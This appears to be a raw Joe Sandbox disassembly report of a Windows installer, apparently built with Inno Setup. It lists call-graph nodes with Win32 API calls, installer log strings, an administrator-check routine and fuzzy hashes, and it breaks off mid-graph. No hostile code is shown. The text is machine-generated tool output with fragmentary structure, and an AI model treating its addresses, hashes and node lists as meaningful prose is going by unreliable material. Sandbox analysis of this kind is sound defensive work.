43d49c 18 API calls 56639->56654 56655 433588 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56639->56655 56640->56639 56641->56639 56642->56639 56643->56595 56644->56593 56645->56593 56646->56621 56648 438f3d 56647->56648 56653->56639 56654->56639 56655->56639 56658 47efd8 56659 47efe1 56658->56659 56661 47f00c 56658->56661 56659->56661 56662 47effe 56659->56662 56660 47f04b 56664 47f05e 56660->56664 56665 47f06b 56660->56665 56661->56660 57069 47d9dc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56661->57069 57067 4756fc 189 API calls 56662->57067 56670 47f062 56664->56670 56671 47f0a0 56664->56671 56667 47f085 56665->56667 56668 47f074 56665->56668 57072 47dbe8 42 API calls 56667->57072 57071 47db78 42 API calls 56668->57071 56669 47f03e 57070 47db78 42 API calls 56669->57070 56681 47f0e3 56670->56681 56682 47f0fe 56670->56682 56683 47f066 56670->56683 56675 47f0c4 56671->56675 56676 47f0a9 56671->56676 56672 47f003 56672->56661 57068 408be8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 56672->57068 57074 47dbe8 42 API calls 56675->57074 57073 47dbe8 42 API calls 56676->57073 57075 47dbe8 42 API calls 56681->57075 57076 47dbe8 42 API calls 56682->57076 56686 47f127 56683->56686 56687 47f145 56683->56687 56688 47f13c 56686->56688 57077 47db78 42 API calls 56686->57077 57079 47d874 24 API calls 56687->57079 57078 47d874 24 API calls 56688->57078 56692 47f143 56693 47f155 56692->56693 56694 47f15b 56692->56694 56695 47f159 56693->56695 56792 47db54 56693->56792 56694->56695 56696 47db54 42 API calls 56694->56696 56797 47b154 56695->56797 56696->56695 57090 47d508 42 API calls 56792->57090 56794 47db6f 57091 408be8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 56794->57091 56798 42d864 GetWindowsDirectoryA 56797->56798 56799 47b172 56798->56799 56800 403450 4 API calls 56799->56800 56801 47b17f 56800->56801 56802 42d890 GetSystemDirectoryA 56801->56802 56803 47b187 56802->56803 56804 403450 4 API calls 56803->56804 56805 47b194 56804->56805 56806 42d8bc 6 API calls 56805->56806 56807 47b19c 56806->56807 56808 403450 4 API calls 56807->56808 56809 47b1a9 56808->56809 56810 47b1b2 56809->56810 56811 47b1ce 56809->56811 57112 42d1d4 56810->57112 56813 403400 4 API calls 56811->56813 56815 47b1cc 56813->56815 56816 47b213 56815->56816 56818 42c898 5 API calls 56815->56818 57092 47afdc 56816->57092 56817 403450 4 API calls 56817->56815 56820 47b1ee 56818->56820 56822 403450 4 API calls 56820->56822 56824 47b1fb 56822->56824 56823 403450 4 API calls 56825 47b22f 56823->56825 56824->56816 56827 403450 4 API calls 56824->56827 56826 47b24d 56825->56826 56828 4035c0 4 API calls 56825->56828 56829 47afdc 8 API calls 56826->56829 56827->56816 56828->56826 56830 47b25c 56829->56830 56831 403450 4 API calls 56830->56831 56832 47b269 56831->56832 56833 47b291 56832->56833 56834 42c40c 5 API calls 56832->56834 57067->56672 57069->56669 57070->56660 57071->56683 57072->56683 57073->56683 57074->56683 57075->56683 57076->56683 57077->56688 57078->56692 57079->56692 57090->56794 57093 42dd44 RegOpenKeyExA 57092->57093 57094 47b002 57093->57094 57095 47b006 57094->57095 57096 47b028 57094->57096 57097 42dc74 6 API calls 57095->57097 57098 403400 4 API calls 57096->57098 57099 47b012 57097->57099 57100 47b02f 57098->57100 57101 47b01d RegCloseKey 57099->57101 57102 403400 4 API calls 57099->57102 57100->56823 57101->57100 57102->57101 57113 4038a4 4 API calls 57112->57113 57114 42d1e7 57113->57114 57115 42d1fe GetEnvironmentVariableA 57114->57115 57119 42d211 57114->57119 57122 42daf8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 57114->57122 57115->57114 57116 42d20a 57115->57116 57117 403400 4 API calls 57116->57117 57117->57119 57119->56817 57122->57114 58612 2472127 58613 2472130 58612->58613 58614 247210a 58613->58614 58616 45cff4 58613->58616 58617 45d003 58616->58617 58618 45d037 VirtualAlloc 58617->58618 58622 408c14 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 58617->58622 58620 45d04f 58618->58620 58620->58614 58621 45d032 58621->58618 58622->58621 58623 416420 58625 416432 58623->58625 58624 416472 GetClassInfoA 58626 41649e 58624->58626 58625->58624 58643 408d34 19 API calls 58625->58643 58628 4164fe 58626->58628 58629 4164c0 RegisterClassA 58626->58629 58630 4164b0 UnregisterClassA 58626->58630 58634 416527 58628->58634 58635 4164f9 58628->58635 58629->58628 58632 4164e8 58629->58632 58630->58629 58631 41646d 58631->58624 58633 408cc4 5 API calls 58632->58633 58633->58635 58644 40754c 58634->58644 58635->58628 58636 408cc4 5 API calls 58635->58636 58636->58634 58640 416540 58641 41a1f8 5 API calls 58640->58641 58642 41654a 58641->58642 58643->58631 58645 407550 58644->58645 58646 40755a 58644->58646 58647 402660 4 API calls 58645->58647 58648 418394 7 API calls 58646->58648 58647->58646 58648->58640 58649 49706c 58707 403344 58649->58707 58651 49707a 58710 4056a0 58651->58710 58653 49707f 58713 406334 GetModuleHandleA GetProcAddress 58653->58713 58659 49708e 58730 410964 58659->58730 58661 497093 58734 412938 58661->58734 58980 4032fc 58707->58980 58709 403349 GetModuleHandleA GetCommandLineA 58709->58651 58712 4056db 58710->58712 58981 4033bc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 58710->58981 58712->58653 58714 406350 58713->58714 58715 406357 GetProcAddress 58713->58715 58714->58715 58716 406366 58715->58716 58717 40636d GetProcAddress 58715->58717 58716->58717 58718 406380 58717->58718 58719 40637c SetProcessDEPPolicy 58717->58719 58720 409954 58718->58720 58719->58718 58982 40902c 58720->58982 58725 408728 7 API calls 58726 409977 58725->58726 58997 409078 GetVersionExA 58726->58997 58729 409b88 6F541CD0 58729->58659 58731 41096e 58730->58731 58732 4109ad GetCurrentThreadId 58731->58732 58733 4109c8 58732->58733 58733->58661 58999 40af0c 58734->58999 58980->58709 58981->58712 58983 408cc4 5 API calls 58982->58983 58984 40903d 58983->58984 58985 4085e4 GetSystemDefaultLCID 58984->58985 58988 40861a 58985->58988 58986 406df4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 58986->58988 58987 408570 LocalAlloc TlsSetValue TlsGetValue TlsGetValue GetLocaleInfoA 58987->58988 58988->58986 58988->58987 58989 403450 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 58988->58989 58993 40867c 58988->58993 58989->58988 58990 406df4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 58990->58993 58991 408570 LocalAlloc TlsSetValue TlsGetValue TlsGetValue GetLocaleInfoA 58991->58993 58992 403450 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 58992->58993 58993->58990 58993->58991 58993->58992 58994 4086ff 58993->58994 58995 403420 4 API calls 58994->58995 58996 408719 58995->58996 58996->58725 58998 40908f 58997->58998 58998->58729 59001 40af13 58999->59001 59000 40af32 59003 41101c 59000->59003 59001->59000 59010 40ae44 19 API calls 59001->59010 59004 41103e 59003->59004 59005 406df4 5 API calls 59004->59005 59006 403450 4 API calls 59004->59006 59007 41105d 59004->59007 59005->59004 59006->59004 59008 403400 4 API calls 59007->59008 59009 411072 59008->59009 59010->59001 60350 41ee64 60351 41ee73 IsWindowVisible 60350->60351 60352 41eea9 60350->60352 60351->60352 60353 41ee7d IsWindowEnabled 60351->60353 60353->60352 60354 41ee87 60353->60354 60355 402648 4 API calls 60354->60355 60356 41ee91 EnableWindow 60355->60356 60356->60352 60357 41fb68 60358 41fb71 60357->60358 60361 41fe0c 60358->60361 60360 41fb7e 60362 41fefe 60361->60362 60363 41fe23 60361->60363 60362->60360 60363->60362 60382 41f9cc GetWindowLongA GetSystemMetrics GetSystemMetrics GetWindowLongA 60363->60382 60365 41fe59 60366 41fe83 60365->60366 60367 41fe5d 60365->60367 60392 41f9cc GetWindowLongA GetSystemMetrics GetSystemMetrics GetWindowLongA 60366->60392 60383 41fbac 60367->60383 60371 41fe91 60373 41fe95 60371->60373 60374 41febb 60371->60374 60372 41fbac 10 API calls 60377 41fe81 60372->60377 60375 41fbac 10 API calls 60373->60375 60376 41fbac 10 API calls 60374->60376 60378 41fea7 60375->60378 60379 41fecd 60376->60379 60377->60360 60380 41fbac 10 API calls 60378->60380 60381 41fbac 10 API calls 60379->60381 60380->60377 60381->60377 60382->60365 60384 41fbc7 60383->60384 60385 41f94c 4 API calls 60384->60385 60386 41fbdd 60384->60386 60385->60386 60393 41f94c 60386->60393 60388 41fc25 60389 41fc48 SetScrollInfo 60388->60389 60401 41faac 60389->60401 60392->60371 60394 4181f0 60393->60394 60395 41f969 GetWindowLongA 60394->60395 60396 41f9a6 60395->60396 60397 41f986 60395->60397 60413 41f8d8 GetWindowLongA GetSystemMetrics GetSystemMetrics 60396->60413 60412 41f8d8 GetWindowLongA GetSystemMetrics GetSystemMetrics 60397->60412 60400 41f992 60400->60388 60402 41faba 60401->60402 60404 41fac2 60401->60404 60402->60372 60403 41faff 60408 41fb41 GetScrollPos 60403->60408 60404->60403 60405 41fb01 60404->60405 60406 41faf1 60404->60406 60415 417e58 IsWindowVisible ScrollWindow SetWindowPos 60405->60415 60414 417e58 IsWindowVisible ScrollWindow SetWindowPos 60406->60414 60408->60402 60410 41fb4c 60408->60410 60411 41fb5b SetScrollPos 60410->60411 60411->60402 60412->60400 60413->60400 60414->60403 60415->60403 60416 4205a8 60417 4205bb 60416->60417 60437 415b40 60417->60437 60419 420702 60420 420719 60419->60420 60444 4146e4 KiUserCallbackDispatcher 60419->60444 60424 420730 60420->60424 60445 414728 KiUserCallbackDispatcher 60420->60445 60421 420661 60442 420858 20 API calls 60421->60442 60422 4205f6 60422->60419 60422->60421 60430 420652 MulDiv 60422->60430 60425 420752 60424->60425 60446 420070 12 API calls 60424->60446 60428 42067a 60428->60419 60443 420070 12 API calls 60428->60443 60441 41a314 LocalAlloc TlsSetValue TlsGetValue TlsGetValue DeleteObject 60430->60441 60433 420697 60434 4206b3 MulDiv 60433->60434 60435 4206d6 60433->60435 60434->60435 60435->60419 60436 4206df MulDiv 60435->60436 60436->60419 60438 415b52 60437->60438 60447 414480 60438->60447 60440 415b6a 60440->60422 60441->60421 60442->60428 60443->60433 60444->60420 60445->60424 60446->60425 60448 41449a 60447->60448 60451 410658 60448->60451 60450 4144b0 60450->60440 60454 40dea4 60451->60454 60453 41065e 60453->60450 60455 40df06 60454->60455 60456 40deb7 60454->60456 60461 40df14 60455->60461 60459 40df14 19 API calls 60456->60459 60460 40dee1 60459->60460 60460->60453 60462 40df24 60461->60462 60464 40df3a 60462->60464 60473 40d7e0 60462->60473 60493 40e29c LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 60462->60493 60476 40e14c 60464->60476 60467 40df42 60468 40d7e0 5 API calls 60467->60468 60469 40dfae 60467->60469 60479 40dd60 60467->60479 60468->60467 60471 40e14c 5 API calls 60469->60471 60472 40df10 60471->60472 60472->60453 60494 40ec08 60473->60494 60502 40d6bc 60476->60502 60480 40e154 5 API calls 60479->60480 60481 40dd93 60480->60481 60482 40eb6c 5 API calls 60481->60482 60483 40dd9e 60482->60483 60484 40eb6c 5 API calls 60483->60484 60485 40dda9 60484->60485 60486 40ddc4 60485->60486 60487 40ddbb 60485->60487 60492 40ddc1 60485->60492 60511 40dbd8 60486->60511 60514 40dcc8 19 API calls 60487->60514 60490 403420 4 API calls 60491 40de8f 60490->60491 60491->60467 60492->60490 60493->60462 60497 40d980 60494->60497 60499 40d98b 60497->60499 60498 40d7ea 60498->60462 60499->60498 60501 40d9cc LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 60499->60501 60501->60499 60503 40ec08 5 API calls 60502->60503 60505 40d6c9 60503->60505 60504 40d6dc 60504->60467 60505->60504 60509 40ed0c LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 60505->60509 60507 40d6d7 60510 40d658 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 60507->60510 60509->60507 60510->60504 60515 40ad7c 19 API calls 60511->60515 60513 40dc00 60513->60492 60514->60492 60515->60513 60516 440be8 60517 440bff WriteFile 60516->60517 60518 440bf1 60516->60518 60519 440c0a 60517->60519 60518->60517 60518->60518 60520 40ce34 60523 406f18 WriteFile 60520->60523 60524 406f35 60523->60524 60525 4222f4 60526 422303 60525->60526 60531 421284 60526->60531 60529 422323 60532 4212f3 60531->60532 60545 421293 60531->60545 60535 421304 60532->60535 60556 4124e0 GetMenuItemCount GetMenuStringA GetMenuState 60532->60556 60534 421332 60537 4213a5 60534->60537 60543 42134d 60534->60543 60535->60534 60536 4213ca 60535->60536 60539 4213de SetMenu 60536->60539 60553 4213a3 60536->60553 60544 4213b9 60537->60544 60537->60553 60538 4213f6 60559 4211cc 10 API calls 60538->60559 60539->60553 60542 4213fd 60542->60529 60554 4221f8 10 API calls 60542->60554 60548 421370 GetMenu 60543->60548 60543->60553 60547 4213c2 SetMenu 60544->60547 60545->60532 60555 408d34 19 API calls 60545->60555 60547->60553 60549 421393 60548->60549 60550 42137a 60548->60550 60557 4124e0 GetMenuItemCount GetMenuStringA GetMenuState 60549->60557 60552 42138d SetMenu 60550->60552 60552->60549 60553->60538 60558 421e3c 11 API calls 60553->60558 60554->60529 60555->60545 60556->60535 60557->60553 60558->60538 60559->60542 60560 2471070 60561 247107c 60560->60561 60563 2471084 60560->60563 60562 2471092 60563->60562 60565 45cff4 5 API calls 60563->60565 60564 24710d3 60565->60564 60566 44acfc 60567 44ad0a 60566->60567 60569 44ad29 60566->60569 60568 44abe0 11 API calls 60567->60568 60567->60569 60568->60569 60570 447f7c 60571 447fb1 60570->60571 60572 447faa 60570->60572 60573 447fd0 60571->60573 60574 447fba 60571->60574 60575 403400 4 API calls 60572->60575 60577 403494 4 API calls 60573->60577 60616 447d80 7 API calls 60574->60616 60578 44815b 60575->60578 60580 447fde 60577->60580 60579 447fc5 60579->60573 60581 447fc9 60579->60581 60582 4037b8 4 API calls 60580->60582 60581->60572 60583 447ffa 60582->60583 60584 4037b8 4 API calls 60583->60584 60585 448016 60584->60585 60585->60572 60586 44802a 60585->60586 60587 4037b8 4 API calls 60586->60587 60588 448044 60587->60588 60589 431424 4 API calls 60588->60589 60590 448066 60589->60590 60591 4314f4 4 API calls 60590->60591 60598 448086 60590->60598 60591->60590 60592 4480dc 60605 441b88 60592->60605 60593 4480c4 60593->60592 60618 442e24 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 60593->60618 60597 448110 GetLastError 60619 447d14 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 60597->60619 60598->60593 60617 442e24 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 60598->60617 60600 44811f 60620 442e64 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 60600->60620 60602 448134 60621 442e74 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 60602->60621 60604 44813c 60606 442b66 60605->60606 60607 441bc1 60605->60607 60609 403400 4 API calls 60606->60609 60608 403400 4 API calls 60607->60608 60610 441bc9 60608->60610 60611 442b7b 60609->60611 60612 431424 4 API calls 60610->60612 60611->60597 60614 441bd5 60612->60614 60613 442b56 60613->60597 60614->60613 60622 441260 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 60614->60622 60616->60579 60617->60598 60618->60592 60619->60600 60620->60602 60621->60604 60622->60614 60623 47ef3e 60624 450664 5 API calls 60623->60624 60625 47ef52 60624->60625 60626 47e064 21 API calls 60625->60626 60627 47ef76 60626->60627 60628 40d07c 60629 40d084 60628->60629 60630 40d0ae 60629->60630 60631 40d0b2 60629->60631 60632 40d0a7 60629->60632 60634 40d0b6 60631->60634 60635 40d0c8 60631->60635 60641 4062a0 GlobalHandle GlobalUnlock GlobalFree 60632->60641 60640 406274 GlobalAlloc GlobalLock 60634->60640 60642 406284 GlobalHandle GlobalUnlock GlobalReAlloc GlobalLock 60635->60642 60638 40d0c4 60638->60630 60639 408cc4 5 API calls 60638->60639 60639->60630 60640->60638 60641->60630 60642->60638 60643 4165fc 73A15CF0
                                                                                    Strings
                                                                                    • Same version. Skipping., xrefs: 0046FCC9
                                                                                    • Existing file is a newer version. Skipping., xrefs: 0046FBE6
                                                                                    • User opted not to overwrite the existing file. Skipping., xrefs: 0046FE31
                                                                                    • Installing into GAC, xrefs: 004706D1
                                                                                    • Version of our file: (none), xrefs: 0046FAE0
                                                                                    • User opted not to strip the existing file's read-only attribute. Skipping., xrefs: 0046FE7A
                                                                                    • Failed to strip read-only attribute., xrefs: 0046FEB7
                                                                                    • InUn, xrefs: 00470129
                                                                                    • Dest filename: %s, xrefs: 0046F878
                                                                                    • Time stamp of our file: %s, xrefs: 0046F97F
                                                                                    • -- File entry --, xrefs: 0046F6DF
                                                                                    • Time stamp of existing file: (failed to read), xrefs: 0046FA1B
                                                                                    • Dest file exists., xrefs: 0046F99F
                                                                                    • Will register the file (a type library) later., xrefs: 004704D0
                                                                                    • Time stamp of existing file: %s, xrefs: 0046FA0F
                                                                                    • Dest file is protected by Windows File Protection., xrefs: 0046F8D1
                                                                                    • Version of existing file: (none), xrefs: 0046FCDE
                                                                                    • Skipping due to "onlyifdestfileexists" flag., xrefs: 0046FEDE
                                                                                    • Couldn't read time stamp. Skipping., xrefs: 0046FD19
                                                                                    • Same time stamp. Skipping., xrefs: 0046FD39
                                                                                    • Version of existing file: %u.%u.%u.%u, xrefs: 0046FB60
                                                                                    • Uninstaller requires administrator: %s, xrefs: 00470159
                                                                                    • Time stamp of our file: (failed to read), xrefs: 0046F98B
                                                                                    • Existing file is protected by Windows File Protection. Skipping., xrefs: 0046FDD0
                                                                                    • Non-default bitness: 32-bit, xrefs: 0046F89F
                                                                                    • Installing the file., xrefs: 0046FEED
                                                                                    • Non-default bitness: 64-bit, xrefs: 0046F893
                                                                                    • Incrementing shared file count (64-bit)., xrefs: 00470549
                                                                                    • @, xrefs: 0046F794
                                                                                    • Existing file's SHA-1 hash matches our file. Skipping., xrefs: 0046FC99
                                                                                    • Will register the file (a DLL/OCX) later., xrefs: 004704DC
                                                                                    • .tmp, xrefs: 0046FF9B
                                                                                    • Skipping due to "onlyifdoesntexist" flag., xrefs: 0046F9B2
                                                                                    • Existing file has a later time stamp. Skipping., xrefs: 0046FDB3
                                                                                    • Failed to read existing file's SHA-1 hash. Proceeding., xrefs: 0046FCB4
                                                                                    • Version of our file: %u.%u.%u.%u, xrefs: 0046FAD4
                                                                                    • Incrementing shared file count (32-bit)., xrefs: 00470562
                                                                                    • , xrefs: 0046FBB3, 0046FD84, 0046FE02
                                                                                    • Stripped read-only attribute., xrefs: 0046FEAB
                                                                                    • Existing file's SHA-1 hash is different from our file. Proceeding., xrefs: 0046FCA8
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: $-- File entry --$.tmp$@$Couldn't read time stamp. Skipping.$Dest file exists.$Dest file is protected by Windows File Protection.$Dest filename: %s$Existing file has a later time stamp. Skipping.$Existing file is a newer version. Skipping.$Existing file is protected by Windows File Protection. Skipping.$Existing file's SHA-1 hash is different from our file. Proceeding.$Existing file's SHA-1 hash matches our file. Skipping.$Failed to read existing file's SHA-1 hash. Proceeding.$Failed to strip read-only attribute.$InUn$Incrementing shared file count (32-bit).$Incrementing shared file count (64-bit).$Installing into GAC$Installing the file.$Non-default bitness: 32-bit$Non-default bitness: 64-bit$Same time stamp. Skipping.$Same version. Skipping.$Skipping due to "onlyifdestfileexists" flag.$Skipping due to "onlyifdoesntexist" flag.$Stripped read-only attribute.$Time stamp of existing file: %s$Time stamp of existing file: (failed to read)$Time stamp of our file: %s$Time stamp of our file: (failed to read)$Uninstaller requires administrator: %s$User opted not to overwrite the existing file. Skipping.$User opted not to strip the existing file's read-only attribute. Skipping.$Version of existing file: %u.%u.%u.%u$Version of existing file: (none)$Version of our file: %u.%u.%u.%u$Version of our file: (none)$Will register the file (a DLL/OCX) later.$Will register the file (a type library) later.
                                                                                    • API String ID: 0-4021121268
                                                                                    • Opcode ID: 39296d02e86210ba95a122c72ed18eadff40a57c25b7f45ff7f5bcbf2b67098f
                                                                                    • Instruction ID: cb3b5b092a3a8f8c122efd66c5c5c6ee12dad63ca724b3077347a87130114cb0
                                                                                    • Opcode Fuzzy Hash: 39296d02e86210ba95a122c72ed18eadff40a57c25b7f45ff7f5bcbf2b67098f
                                                                                    • Instruction Fuzzy Hash: 9B928234A04288DFCB11DFA5D445BDDBBB1AF05304F5480ABE884BB392D7789E49CB5A

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1530 42dfc4-42dfd5 1531 42dfe0-42e005 AllocateAndInitializeSid 1530->1531 1532 42dfd7-42dfdb 1530->1532 1533 42e1af-42e1b7 1531->1533 1534 42e00b-42e028 GetVersion 1531->1534 1532->1533 1535 42e041-42e043 1534->1535 1536 42e02a-42e03f GetModuleHandleA GetProcAddress 1534->1536 1537 42e045-42e053 CheckTokenMembership 1535->1537 1538 42e06a-42e084 GetCurrentThread OpenThreadToken 1535->1538 1536->1535 1541 42e191-42e1a7 FreeSid 1537->1541 1542 42e059-42e065 1537->1542 1539 42e086-42e090 GetLastError 1538->1539 1540 42e0bb-42e0e3 GetTokenInformation 1538->1540 1543 42e092-42e097 call 4031bc 1539->1543 1544 42e09c-42e0af GetCurrentProcess OpenProcessToken 1539->1544 1545 42e0e5-42e0ed GetLastError 1540->1545 1546 42e0fe-42e122 call 402648 GetTokenInformation 1540->1546 1542->1541 1543->1533 1544->1540 1549 42e0b1-42e0b6 call 4031bc 1544->1549 1545->1546 1550 42e0ef-42e0f9 call 4031bc * 2 1545->1550 1555 42e130-42e138 1546->1555 1556 42e124-42e12e call 4031bc * 2 1546->1556 1549->1533 1550->1533 1560 42e13a-42e13b 1555->1560 1561 42e16b-42e189 call 402660 CloseHandle 1555->1561 1556->1533 1564 42e13d-42e150 EqualSid 1560->1564 1561->1541 1568 42e152-42e15f 1564->1568 1569 42e167-42e169 1564->1569 1568->1569 1572 42e161-42e165 1568->1572 1569->1561 1569->1564 1572->1561
                                                                                    APIs
                                                                                    • AllocateAndInitializeSid.ADVAPI32(00498788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042DFFE
                                                                                    • GetVersion.KERNEL32(00000000,0042E1A8,?,00498788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E01B
                                                                                    • GetModuleHandleA.KERNEL32(advapi32.dll,CheckTokenMembership,00000000,0042E1A8,?,00498788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E034
                                                                                    • GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 0042E03A
                                                                                    • CheckTokenMembership.KERNELBASE(00000000,00000000,?,00000000,0042E1A8,?,00498788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E04F
                                                                                    • FreeSid.ADVAPI32(00000000,0042E1AF,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E1A2
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressAllocateCheckFreeHandleInitializeMembershipModuleProcTokenVersion
                                                                                    • String ID: CheckTokenMembership$advapi32.dll
                                                                                    • API String ID: 2252812187-1888249752
                                                                                    • Opcode ID: de8d44d672a8929b680763389e92ce8a04460e4e95b38bd413b506cbd288daf1
                                                                                    • Instruction ID: 81e9a68d7eb5b753086264e3ea48cb09d3699a943d7b2bc0788aba7922d59162
                                                                                    • Opcode Fuzzy Hash: de8d44d672a8929b680763389e92ce8a04460e4e95b38bd413b506cbd288daf1
                                                                                    • Instruction Fuzzy Hash: DE51B271B40625AEEB10EAF69C42BBF77ACDB09704F54047BB900F7282D5BC89158A69

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1860 423c1c-423c50 1861 423c52-423c53 1860->1861 1862 423c84-423c9b call 423b78 1860->1862 1864 423c55-423c71 call 40b44c 1861->1864 1867 423cfc-423d01 1862->1867 1868 423c9d 1862->1868 1896 423c73-423c7b 1864->1896 1897 423c80-423c82 1864->1897 1870 423d03 1867->1870 1871 423d37-423d3c 1867->1871 1872 423ca3-423ca6 1868->1872 1873 423d60-423d70 1868->1873 1874 423fc1-423fc9 1870->1874 1875 423d09-423d11 1870->1875 1878 423d42-423d45 1871->1878 1879 4240aa-4240b8 IsIconic 1871->1879 1876 423cd5-423cd8 1872->1876 1877 423ca8 1872->1877 1880 423d72-423d77 1873->1880 1881 423d7b-423d83 call 4241a4 1873->1881 1885 424162-42416a 1874->1885 1891 423fcf-423fda call 4181f0 1874->1891 1883 423f23-423f4a SendMessageA 1875->1883 1884 423d17-423d1c 1875->1884 1892 423db9-423dc0 1876->1892 1893 423cde-423cdf 1876->1893 1887 423e06-423e16 call 423b94 1877->1887 1888 423cae-423cb1 1877->1888 1889 4240e6-4240fb call 424860 1878->1889 1890 423d4b-423d4c 1878->1890 1879->1885 1886 4240be-4240c9 GetFocus 1879->1886 1894 423d88-423d90 call 4241ec 1880->1894 1895 423d79-423d9c call 423b94 1880->1895 1881->1885 1883->1885 1899 423d22-423d23 1884->1899 1900 42405a-424065 1884->1900 1901 424181-424187 1885->1901 1886->1885 1908 4240cf-4240d8 call 41f004 1886->1908 1887->1885 1909 423cb7-423cba 1888->1909 1910 423e2e-423e4a PostMessageA call 423b94 1888->1910 1889->1885 1903 423d52-423d55 1890->1903 1904 4240fd-424104 1890->1904 1891->1885 1952 423fe0-423fef call 4181f0 IsWindowEnabled 1891->1952 1892->1885 1913 423dc6-423dcd 1892->1913 1914 423ce5-423ce8 1893->1914 1915 423f4f-423f56 1893->1915 1894->1885 1895->1885 1896->1901 1897->1862 1897->1864 1916 424082-42408d 1899->1916 1917 423d29-423d2c 1899->1917 1900->1885 1919 42406b-42407d 1900->1919 1920 424130-424137 1903->1920 1921 423d5b 1903->1921 1930 424106-424119 call 4244e4 1904->1930 1931 42411b-42412e call 42453c 1904->1931 1908->1885 1966 4240de-4240e4 SetFocus 1908->1966 1927 423cc0-423cc3 1909->1927 1928 423eb5-423ebc 1909->1928 1910->1885 1913->1885 1933 423dd3-423dd9 1913->1933 1934 423cee-423cf1 1914->1934 1935 423e4f-423e6f call 423b94 1914->1935 1915->1885 1923 423f5c-423f61 call 404e54 1915->1923 1916->1885 1941 424093-4240a5 1916->1941 1938 423d32 1917->1938 1939 423f66-423f6e 1917->1939 1919->1885 1936 42414a-424159 1920->1936 1937 424139-424148 1920->1937 1940 42415b-42415c call 423b94 1921->1940 1923->1885 1947 423cc9-423cca 1927->1947 1948 423dde-423dec IsIconic 1927->1948 1949 423ebe-423ed1 call 423b24 1928->1949 1950 423eef-423f00 call 423b94 1928->1950 1930->1885 1931->1885 1933->1885 1953 423cf7 1934->1953 1954 423e1b-423e29 call 424188 1934->1954 1981 423e93-423eb0 call 423a94 PostMessageA 1935->1981 1982 423e71-423e8e call 423b24 PostMessageA 1935->1982 1936->1885 1937->1885 1938->1940 1939->1885 1964 423f74-423f7b 1939->1964 1977 424161 1940->1977 1941->1885 1967 423cd0 1947->1967 1968 423da1-423da9 1947->1968 1957 423dfa-423e01 call 423b94 1948->1957 1958 423dee-423df5 call 423bd0 1948->1958 1994 423ee3-423eea call 423b94 1949->1994 1995 423ed3-423edd call 41ef68 1949->1995 1988 423f02-423f08 call 41eeb4 1950->1988 1989 423f16-423f1e call 423a94 1950->1989 1952->1885 1985 423ff5-424004 call 4181f0 IsWindowVisible 1952->1985 1953->1940 1954->1885 1957->1885 1958->1885 1964->1885 1980 423f81-423f90 call 4181f0 IsWindowEnabled 1964->1980 1966->1885 1967->1940 1968->1885 1983 423daf-423db4 call 422c5c 1968->1983 1977->1885 1980->1885 2009 423f96-423fac call 412320 1980->2009 1981->1885 1982->1885 1983->1885 1985->1885 2011 42400a-424055 GetFocus call 4181f0 SetFocus call 415250 SetFocus 1985->2011 2007 423f0d-423f10 